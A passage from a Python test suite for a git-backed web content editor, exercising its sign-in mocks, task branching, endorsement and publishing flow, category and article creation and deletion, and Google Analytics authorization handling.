response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that the project is listed in the edited column
soup = BeautifulSoup(response.data)
pub_ul = soup.select("#activity-list-edited")[0]
# there should be an HTML comment with the branch name
comments = pub_ul.findAll(text=lambda text: isinstance(text, Comment))
found = False
for comment in comments:
if generated_branch_name in comment:
found = True
pub_li = comment.find_parent('li')
# and the activity title wrapped in an a tag
self.assertIsNotNone(pub_li.find('a', text=fake_task_description))
self.assertEqual(True, found)
# Request feedback on the change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name), data={'comment_text': u'', 'request_feedback': u'Request Feedback'}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(u'{} {}'.format(fake_author_email, repo_functions.ACTIVITY_FEEDBACK_MESSAGE) in response.data)
#
#
# Log in as a different person
with HTTMock(self.mock_persona_verify_frances):
self.test_client.post('/sign-in', data={'assertion': fake_endorser_email})
with HTTMock(self.auth_csv_example_allowed):
# get the edit page for the branch
response = self.test_client.get('/tree/{}/edit/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that there's an 'Endorse Edits' button
soup = BeautifulSoup(response.data)
self.assertIsNotNone(soup.find("button", {"data-test-id": "endorse-edits-button"}))
# get the overview page for the branch
response = self.test_client.get('/tree/{}/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that there's an 'Endorse Edits' button
soup = BeautifulSoup(response.data)
self.assertIsNotNone(soup.find("button", {"data-test-id": "endorse-edits-button"}))
# get the activity list page
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that the project is listed in the feedback needed column
soup = BeautifulSoup(response.data)
pub_ul = soup.select("#activity-list-feedback")[0]
# there should be an HTML comment with the branch name
comment = pub_ul.findAll(text=lambda text: isinstance(text, Comment))[0]
self.assertTrue(generated_branch_name in comment)
pub_li = comment.find_parent('li')
# and the activity title wrapped in an a tag
self.assertIsNotNone(pub_li.find('a', text=fake_task_description))
# Endorse the change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name), data={'comment_text': u'', 'endorse_edits': 'Endorse Edits'}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(u'{} {}'.format(fake_endorser_email, repo_functions.ACTIVITY_ENDORSED_MESSAGE) in response.data)
# log back in as the original editor
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# get the edit page for the branch
response = self.test_client.get('/tree/{}/edit/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that there's a 'publish' button
soup = BeautifulSoup(response.data)
self.assertIsNotNone(soup.find("button", {"data-test-id": "publish-button"}))
# get the overview page for the branch
response = self.test_client.get('/tree/{}/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that there's a 'publish' button
soup = BeautifulSoup(response.data)
self.assertIsNotNone(soup.find("button", {"data-test-id": "publish-button"}))
# get the activity list page
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that the project is listed in the ready to publish column
soup = BeautifulSoup(response.data)
pub_ul = soup.select("#activity-list-endorsed")[0]
# there should be an HTML comment with the branch name
comment = pub_ul.findAll(text=lambda text: isinstance(text, Comment))[0]
self.assertTrue(generated_branch_name in comment)
pub_li = comment.find_parent('li')
# and the activity title wrapped in an a tag
self.assertIsNotNone(pub_li.find('a', text=fake_task_description))
# And publish the change!
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name), data={'comment_text': u'', 'merge': 'Publish'}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
# should've been redirected to the front page
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('activities-list') in response.data)
# verify that the project is listed in the recently published column
soup = BeautifulSoup(response.data)
pub_ul = soup.select("#activity-list-published")[0]
# there should be an HTML comment with the branch name
comment = pub_ul.findAll(text=lambda text: isinstance(text, Comment))[0]
self.assertTrue(generated_branch_name in comment)
pub_li = comment.find_parent('li')
# and the activity title wrapped in an a tag
self.assertIsNotNone(pub_li.find('a', text=fake_task_description))
# in TestApp
def test_get_request_does_not_create_branch(self):
''' Navigating to a made-up URL should not create a branch
'''
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.auth_csv_example_allowed):
fake_branch_name = 'this-should-not-create-a-branch'
#
# edit
#
response = self.test_client.get('/tree/{}/edit/'.format(fake_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 404)
self.assertTrue(view_functions.MESSAGE_ACTIVITY_DELETED in response.data)
# the branch path should not be in the returned HTML
self.assertFalse(PATTERN_BRANCH_COMMENT.format(fake_branch_name) in response.data)
# the branch name should not be in the origin's branches list
self.assertFalse(fake_branch_name in self.origin.branches)
#
# history
#
response = self.test_client.get('/tree/{}/history/'.format(fake_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 404)
self.assertTrue(view_functions.MESSAGE_ACTIVITY_DELETED in response.data)
# the branch path should not be in the returned HTML
self.assertFalse(PATTERN_BRANCH_COMMENT.format(fake_branch_name) in response.data)
# the branch name should not be in the origin's branches list
self.assertFalse(fake_branch_name in self.origin.branches)
#
# view
#
response = self.test_client.get('/tree/{}/view/'.format(fake_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 404)
self.assertTrue(view_functions.MESSAGE_ACTIVITY_DELETED in response.data)
# the branch path should not be in the returned HTML
self.assertFalse(PATTERN_BRANCH_COMMENT.format(fake_branch_name) in response.data)
# the branch name should not be in the origin's branches list
self.assertFalse(fake_branch_name in self.origin.branches)
# in TestApp
def test_post_request_does_not_create_branch(self):
''' Certain POSTs to a made-up URL should not create a branch
'''
fake_page_slug = u'hello'
fake_page_path = u'{}/index.{}'.format(fake_page_slug, constants.CONTENT_FILE_EXTENSION)
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.auth_csv_example_allowed):
#
# try creating an article in a non-existent branch
#
fake_branch_name = repo_functions.make_branch_name()
response = self.test_client.post('/tree/{}/edit/'.format(fake_branch_name), data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': fake_page_slug}, follow_redirects=True)
self.assertEqual(response.status_code, 404)
self.assertTrue(view_functions.MESSAGE_ACTIVITY_DELETED in response.data)
# the branch name should not be in the origin's branches list
self.assertFalse(fake_branch_name in self.origin.branches)
#
# create a branch, then delete it right before POSTing a save command
#
fake_task_description = u'Doing fake stuff for Nobody'
response = self.test_client.post('/start', data={'task_description': fake_task_description}, follow_redirects=True)
# we should be on the new task's edit page
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
self.assertTrue(PATTERN_TASK_COMMENT.format(fake_task_description) in response.data)
# extract the generated branch name from the returned HTML
generated_branch_search = search(r'<!-- branch: (.{{{}}}) -->'.format(repo_functions.BRANCH_NAME_LENGTH), response.data)
self.assertIsNotNone(generated_branch_search)
try:
generated_branch_name = generated_branch_search.group(1)
except AttributeError:
raise Exception('No match for generated branch name.')
# create a new article
response = self.test_client.post('/tree/{}/edit/'.format(generated_branch_name), data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': fake_page_slug}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('article-edit') in response.data)
# load the article list and verify that the new article is listed
response = self.test_client.get('/tree/{}/edit/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
self.assertTrue(PATTERN_BRANCH_COMMENT.format(generated_branch_name) in response.data)
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": fake_page_slug, "file_title": fake_page_slug, "file_type": constants.ARTICLE_LAYOUT}) in response.data)
# load the article edit page and grab the hexsha from the form
response = self.test_client.get('/tree/{}/edit/{}'.format(generated_branch_name, fake_page_path))
self.assertEqual(response.status_code, 200)
hexsha = search(r'<input name="hexsha" value="(\w+)"', response.data).group(1)
# delete the branch
response = self.test_client.post('/update', data={'abandon': 'Delete', 'branch': '{}'.format(generated_branch_name)}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertFalse(generated_branch_name in response.data)
# try submitting a change to the article
response = self.test_client.post('/tree/{}/save/{}'.format(generated_branch_name, fake_page_path), data={'layout': constants.ARTICLE_LAYOUT, 'hexsha': hexsha, 'en-title': 'Greetings', 'en-body': 'Hello world.\n', 'fr-title': '', 'fr-body': '', 'url-slug': 'hello'}, follow_redirects=True)
self.assertEqual(response.status_code, 404)
self.assertTrue(view_functions.MESSAGE_ACTIVITY_DELETED in response.data)
# the task name should not be in the returned HTML
self.assertFalse(PATTERN_TASK_COMMENT.format(fake_task_description) in response.data)
# the branch name should not be in the origin's branches list
self.assertFalse('{}'.format(generated_branch_name) in self.origin.branches)
# in TestApp
def test_accessing_local_branch_fetches_remote(self):
''' GETting or POSTing to a URL that indicates a branch that exists remotely but not locally
fetches the remote branch and allows access
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
disposable_task_description = u'unimportant task for unimportant person'
response = self.test_client.post('/start', data={'task_description': disposable_task_description}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
self.assertTrue(PATTERN_TASK_COMMENT.format(disposable_task_description) in response.data)
# create a branch programmatically on our pre-made clone
check_task_description = u'the branch we are checking for for just me'
check_branch = repo_functions.get_start_branch(self.clone1, 'master', check_task_description, fake_author_email)
self.assertTrue(check_branch.name in self.clone1.branches)
self.assertTrue(check_branch.name in self.origin.branches)
# verify that the branch doesn't exist in our new clone
with self.app.app_context():
with self.app.test_request_context():
from flask import session
session['email'] = fake_author_email
new_clone = view_functions.get_repo(flask_app=self.app)
self.assertFalse(check_branch.name in new_clone.branches)
# request an edit page for the check branch through the http interface
response = self.test_client.get('/tree/{}/edit/'.format(check_branch.name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# the task description should be in the returned HTML
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
self.assertTrue(PATTERN_TASK_COMMENT.format(check_task_description) in response.data)
# the branch name should now be in the original repo's branches list
self.assertTrue(check_branch.name in new_clone.branches)
# in TestApp
def test_git_merge_strategy_implemented(self):
''' The Git merge strategy has been implemented for a new clone.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# create a new clone via get_repo
with self.app.app_context():
with self.app.test_request_context():
from flask import session
session['email'] = fake_author_email
new_clone = view_functions.get_repo(flask_app=self.app)
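# the clone should come configured with an 'ignored' merge driver and a matching attributes
# entry, so the task metadata file never causes merge conflicts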
# check for the config setting
self.assertEqual(new_clone.config_reader().get_value('merge "ignored"', 'driver'), True)
# check for the attributes setting
attributes_path = join(new_clone.git_dir, 'info/attributes')
self.assertTrue(exists(attributes_path))
with open(attributes_path, 'r') as file:
content = file.read().decode("utf-8")
self.assertEqual(content, u'{} merge=ignored'.format(repo_functions.TASK_METADATA_FILENAME))
# in TestApp
def test_task_metadata_should_exist(self):
''' Task metadata file should exist but doesn't; the edit page should still work.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
fake_task_description = u'unimportant task for unimportant person'
branch1 = repo_functions.get_start_branch(self.clone1, 'master', fake_task_description, fake_author_email)
branch1_name = branch1.name
branch1.checkout()
# verify that the most recent commit on the new branch is for starting the activity
self.assertTrue(repo_functions.ACTIVITY_CREATED_MESSAGE in branch1.commit.message)
# validate the existence of the task metadata file
self.assertTrue(repo_functions.verify_file_exists_in_branch(self.clone1, repo_functions.TASK_METADATA_FILENAME, branch1_name))
# now delete it
repo_functions.delete_task_metadata_for_branch(self.clone1, 'master')
self.assertFalse(repo_functions.verify_file_exists_in_branch(self.clone1, repo_functions.TASK_METADATA_FILENAME, branch1_name))
# verify that we can load a functional edit page for the branch
with HTTMock(self.auth_csv_example_allowed):
# request an edit page for the check branch through the http interface
response = self.test_client.get('/tree/{}/edit/'.format(branch1_name), follow_redirects=True)
# it's a good response
self.assertEqual(response.status_code, 200)
# the branch name should be in the returned HTML
self.assertTrue(PATTERN_BRANCH_COMMENT.format(branch1_name) in response.data)
# the 'Started by' should be 'Unknown' for now
self.assertTrue(PATTERN_AUTHOR_COMMENT.format(u'unknown') in response.data)
# in TestApp
def test_google_callback_is_successful(self):
''' Ensure we get a successful page load on callback from Google authentication
'''
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.mock_google_authorization):
self.test_client.post('/authorize')
with HTTMock(self.mock_successful_google_callback):
response = self.test_client.get('/callback?state=PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP&code=code')
with self.app.app_context():
ga_config = google_api_functions.read_ga_config(self.app.config['RUNNING_STATE_DIR'])
self.assertEqual(ga_config['access_token'], 'meowser_token')
self.assertEqual(ga_config['refresh_token'], 'refresh_meows')
self.assertTrue('/setup' in response.location)
# in TestApp
def test_analytics_setup_is_successful(self):
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.mock_google_authorization):
self.test_client.post('/authorize')
# mock-post the form in authorize.html to authorization-complete.html with some dummy values and check the results
response = self.test_client.post('/authorization-complete', data={'email': 'erica@example.com', 'name': 'Jane Doe', 'google_email': 'erica@example.com', 'return_link': 'http://example.com', 'property': '12345678', '12345678-domain': 'http://propertyone.example.com', '12345678-name': 'Property One'})
self.assertEqual(u'200 OK', response.status)
with self.app.app_context():
ga_config = google_api_functions.read_ga_config(self.app.config['RUNNING_STATE_DIR'])
# views.authorization_complete() strips the 'http://' from the domain
self.assertEqual(ga_config['project_domain'], 'propertyone.example.com')
self.assertEqual(ga_config['profile_id'], '12345678')
# in TestApp
def test_handle_bad_analytics_response(self):
''' Verify that an unauthorized analytics response is handled correctly
'''
with HTTMock(self.mock_google_invalid_credentials_response):
with self.app.app_context():
analytics_dict = google_api_functions.fetch_google_analytics_for_page(self.app.config, u'index.html', 'meowser_token')
self.assertEqual(analytics_dict, {})
# in TestApp
def test_google_callback_fails(self):
''' Ensure that we get an appropriate error flashed when we fail to authenticate with Google
'''
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.mock_google_authorization):
response = self.test_client.post('/authorize')
with HTTMock(self.mock_failed_google_callback):
response = self.test_client.get('/callback?state=PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP&code=code', follow_redirects=True)
self.assertEqual(response.status_code, 200)
# find the flashed error message in the returned HTML
self.assertTrue('Google rejected authorization request' in response.data)
# in TestApp
def test_invalid_access_token(self):
''' Ensure that we get an appropriate error flashed when we have an invalid access token
'''
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
self.assertEqual(response.status_code, 200)
with HTTMock(self.mock_google_invalid_credentials_response):
response = self.test_client.get('/setup', follow_redirects=True)
self.assertEqual(response.status_code, 200)
# find the flashed error message in the returned HTML
self.assertTrue('Invalid Credentials' in response.data)
# in TestApp
def test_no_properties_found(self):
''' Ensure that we get an appropriate error flashed when no analytics properties are
associated with the authorized Google account
'''
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
self.assertEqual(response.status_code, 200)
with HTTMock(self.mock_google_no_properties_response):
response = self.test_client.get('/setup', follow_redirects=True)
self.assertEqual(response.status_code, 200)
# find the flashed error message in the returned HTML
self.assertTrue('Your Google Account is not associated with any Google Analytics properties' in response.data)
# in TestApp
def test_redirect(self):
''' Check redirect to BROWSERID_URL.
'''
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.get('/not-allowed', headers={'Host': 'wrong.local'})
expected_url = urljoin(self.app.config['BROWSERID_URL'], '/not-allowed')
self.assertEqual(response.status_code, 302)
self.assertEqual(response.headers['Location'], expected_url)
# in TestApp
def test_create_category(self):
''' Creating a new category creates a directory with an appropriate index file inside.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'force a clam shell open for starfish'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new category
page_slug = u'hello'
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, page_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the category test
self.assertTrue(view_functions.is_category_dir(dir_location))
# in TestApp
def test_period_in_category_name(self):
''' Putting a period in a category or subcategory name doesn't crop it.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email='erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Be Shot Hundreds Of Feet Into The Air for A Geyser Of Highly Pressurized Water')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
other_slug = u'other'
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, other_slug))
# Create a category that has a period in its name
category_name = u'Mt. Splashmore'
category_slug = slugify(category_name)
erica.add_category(category_name=category_name)
# the category is correctly represented on the page
self.assertIsNotNone(erica.soup.find(lambda tag: bool(tag.name == 'a' and category_name in tag.text)))
self.assertIsNotNone(erica.soup.find(lambda tag: bool(tag.name == 'a' and category_slug in tag['href'])))
# the category is correctly represented on disk
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
cat_location = join(repo.working_dir, u'{}/{}'.format(other_slug, category_slug))
self.assertTrue(exists(cat_location))
self.assertTrue(view_functions.is_category_dir(cat_location))
# in TestApp
def test_empty_category_or_article_name(self):
''' Submitting an empty category or article name reloads with a warning.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email='erica@example.com')
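# BeautifulSoup returns comment nodes without the <!-- --> delimiters, so strip them
# from the pattern before matching against the page's comments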
pattern_template_comment_stripped = sub(ur'<!--|-->', u'', PATTERN_TEMPLATE_COMMENT)
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Deep-Fry a Buffalo in Forty Seconds for Moe')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
other_slug = u'other'
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, other_slug))
# Try to create a category with no name
category_name = u''
erica.add_category(category_name=category_name)
# the articles-list template reloaded
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_template_comment_stripped.format(u'articles-list') in comments)
# verify that there's a flash message warning about submitting an empty topic name
self.assertEqual(u'Please enter a name to create a topic!', erica.soup.find('li', class_='flash').text)
# Try to create a category with a name that slugifies to an empty string
category_name = u'(╯□)╯︵ ┻━┻'
self.assertEqual(u'', slugify(category_name))
erica.add_category(category_name=category_name)
# the articles-list template reloaded
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_template_comment_stripped.format(u'articles-list') in comments)
# verify that there's a flash message warning about submitting an unacceptable topic name
self.assertEqual(u'{} is not an acceptable topic name!'.format(category_name), erica.soup.find('li', class_='flash').text)
# Create a category and sub-category
category_name = u'Mammals'
subcategory_name = u'Bison'
erica.add_category(category_name=category_name)
erica.add_subcategory(subcategory_name=subcategory_name)
# Try to create an article with no name
article_name = u''
erica.add_article(article_name=article_name)
# the articles-list template reloaded
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_template_comment_stripped.format(u'articles-list') in comments)
# verify that there's a flash message warning about submitting an empty article name
self.assertEqual(u'Please enter a name to create an article!', erica.soup.find('li', class_='flash').text)
# Try to create an article with a name that slugifies to an empty string
article_name = u'(╯□)╯︵ ┻━┻'
self.assertEqual(u'', slugify(article_name))
erica.add_article(article_name=article_name)
# the articles-list template reloaded
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_template_comment_stripped.format(u'articles-list') in comments)
# verify that there's a flash message warning about submitting an unacceptable article name
self.assertEqual(u'{} is not an acceptable article name!'.format(article_name), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_create_duplicate_category(self):
''' If we ask to create a category that exists, let's not and say we did.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
working_branch = repo_functions.get_start_branch(self.clone1, 'master', u'force a clam shell open for starfish', fake_author_email)
working_branch.checkout()
# create a new category
request_data = {'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': u'hello'}
response = self.test_client.post('/tree/{}/edit/'.format(working_branch.name),
data=request_data,
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# now do it again
response = self.test_client.post('/tree/{}/edit/'.format(working_branch.name),
data=request_data,
follow_redirects=True)
self.assertEqual(response.status_code, 200)
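# unescape HTML-encoded double quotes (&#34;) in the response before checking the flash message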
response_data = sub('&#34;', '"', response.data.decode('utf-8'))
self.assertTrue(u'Topic "hello" already exists' in response_data)
# pull the changes
self.clone1.git.pull('origin', working_branch.name)
# everything looks good
dir_location = join(self.clone1.working_dir, u'hello')
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the category test
self.assertTrue(view_functions.is_category_dir(dir_location))
# in TestApp
def test_delete_categories_and_articles(self):
''' Non-empty categories and articles can be deleted
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'vomit digestive fluid onto rotting flesh for flies'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a categories directory
categories_slug = u'categories'
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': categories_slug},
follow_redirects=True)
# and put a new category inside it
cata_title = u'Mouth Parts'
cata_slug = slugify(cata_title)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, categories_slug),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': cata_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# put another category inside that
catb_title = u'Esophagus'
catb_slug = slugify(catb_title)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, join(categories_slug, cata_slug)),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': catb_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# and an article inside that
art_title = u'Stomach'
art_slug = slugify(art_title)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, join(categories_slug, cata_slug, catb_slug)),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': art_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# verify that the categories and article exist
art_location = join(self.clone1.working_dir, categories_slug, cata_slug, catb_slug, art_slug)
catb_location = join(self.clone1.working_dir, categories_slug, cata_slug, catb_slug)
cata_location = join(self.clone1.working_dir, categories_slug, cata_slug)
self.assertTrue(exists(art_location))
self.assertTrue(view_functions.is_article_dir(art_location))
# delete category a
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, join(categories_slug, cata_slug)),
data={'action': 'delete_category'},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# verify that the deleted category and article no longer exist
self.assertFalse(exists(art_location))
self.assertFalse(exists(catb_location))
self.assertFalse(exists(cata_location))
# in TestApp
def test_delete_commit_accuracy(self):
''' The record of a delete in the corresponding commit is accurate.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email=erica_email)
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Ferment Tuber Fibres Using Symbiotic Bacteria in the Intestines for Naked Mole Rats')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
erica.follow_link(href='/tree/{}/edit/other/'.format(branch_name))
# Create a category and fill it with some subcategories and articles
category_names = [u'Indigestible Cellulose']
subcategory_names = [u'Volatile Fatty Acids', u'Non-Reproducing Females', u'Arid African Deserts']
article_names = [u'Eusocial Exhibition', u'Old Enough to Eat Solid Food', u'Contributing to Extension of Tunnels', u'Foraging and Nest Building']
erica.add_category(category_name=category_names[0])
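# remember the category page's path so we can return to it after adding each subcategory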
category_path = erica.path
erica.add_subcategory(subcategory_name=subcategory_names[0])
erica.open_link(category_path)
erica.add_subcategory(subcategory_name=subcategory_names[1])
erica.open_link(category_path)
erica.add_subcategory(subcategory_name=subcategory_names[2])
subcategory_path = erica.path
erica.add_article(article_name=article_names[0])
erica.open_link(subcategory_path)
erica.add_article(article_name=article_names[1])
erica.open_link(subcategory_path)
erica.add_article(article_name=article_names[2])
erica.open_link(subcategory_path)
erica.add_article(article_name=article_names[3])
# Delete the all-containing category
erica.open_link(category_path)
erica.follow_modify_category_link(category_names[0])
erica.delete_category()
# get and check the history
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
activity = chime_activity.ChimeActivity(repo=repo, branch_name=branch_name, default_branch_name='master', actor_email=erica_email)
activity_history = activity.history
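# the first (most recent) history entry holds the actions recorded by the category delete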
delete_history = activity_history[0]['actions']
for item in delete_history:
self.assertEqual(item['action'], u'delete')
if item['title'] in category_names:
self.assertEqual(item['display_type'], constants.CATEGORY_LAYOUT)
category_names.remove(item['title'])
elif item['title'] in subcategory_names:
self.assertEqual(item['display_type'], constants.CATEGORY_LAYOUT)
subcategory_names.remove(item['title'])
elif item['title'] in article_names:
self.assertEqual(item['display_type'], constants.ARTICLE_LAYOUT)
article_names.remove(item['title'])
# every category, subcategory, and article name should have been matched and removed from the lists
self.assertEqual(len(category_names), 0)
self.assertEqual(len(subcategory_names), 0)
self.assertEqual(len(article_names), 0)
# in TestApp
def test_delete_article(self):
''' An article can be deleted
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'Remove Small Organic Particles From Seawater Passing Over Outspread Tentacles for Sea Anemones'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create an article
art_title = u'Zooplankters'
art_slug = slugify(art_title)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': art_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# verify that the article exists
art_location = join(self.clone1.working_dir, art_slug)
self.assertTrue(exists(art_location))
self.assertTrue(view_functions.is_article_dir(art_location))
# delete the article
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, art_slug),
data={'action': 'delete_article', 'request_path': art_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# verify that the deleted category and article no longer exist
self.assertFalse(exists(art_location))
# in TestApp
def test_article_creation_with_unicode_via_web_interface(self):
''' An article with unicode in its title is created as expected.
'''
